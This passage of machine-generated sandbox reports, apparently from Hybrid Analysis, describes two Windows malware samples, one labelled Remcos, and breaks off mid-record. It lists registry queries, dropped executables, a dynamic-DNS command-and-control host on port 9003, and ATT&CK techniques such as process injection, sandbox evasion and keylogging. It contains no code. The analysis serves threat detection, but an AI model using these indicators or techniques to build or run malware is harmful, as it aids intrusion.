\"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"0175D5836AE47664425A5957A2C9A6D425D20C104B008EC4B38F9DC60BA5D7A0\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"PRODUCTNAME\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: 00000000-00005948]\n \"DISMHOST.EXE.67A9C5A4.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00005948]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4677992'}\" (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4677944'}\" (UID: 00000000-00005948)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"FindResourceW\" with parameter \"123\" - (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"FindResourceW\" with parameter \"3\" - (UID: 00000000-00005948)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005948)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005948)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-52", "type": 7, "relevance": 1, "name": "Contacts Dynamic DNS (possible C&C communication)", "description": "\"tristansupport.duckdns.org\"", "origin": "Network Traffic", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "External Systems", "identifier": "suricata-0", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain\" (SID: 2022918, Rev: 5, Severity: 3) categorized as \"Misc activity\"", "origin": "Suricata Alerts"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" has resource with unusual entropy \"RT_RCDATA:7.84413572461\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"DISMHOST.EXE.67A9C5A4.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00005948]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" has section name .text with entropy \"6.62446252724\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" has section name .reloc with entropy \"6.71659520483\"\n \"DISMHOST.EXE.67A9C5A4.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A9C5A4.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" connects to <IPv4> on port 9003 (TCP); Domain: \"tristansupport.duckdns.org\"", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain\" (SID: 2042936, Rev: 3, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 9003", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5
https://hybrid-analysis.com/sample/395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5
Hybrid Analysis - Remcos
{"size": 1448960, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5", "sha256": "395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5", "av_detect": 4, "vx_family": "BScope.Backdoor", "threat_score": 45, "threat_level": 1, "verdict": "suspicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 108, "processes": [{"uid": "00000000-00005520", "name": "395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe", "normalized_path": "C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe", "sha256": "395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Office Application Startup", "attck_id": "T1137", "attck_id_wiki": "https://attack.mitre.org/techniques/T1137", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", 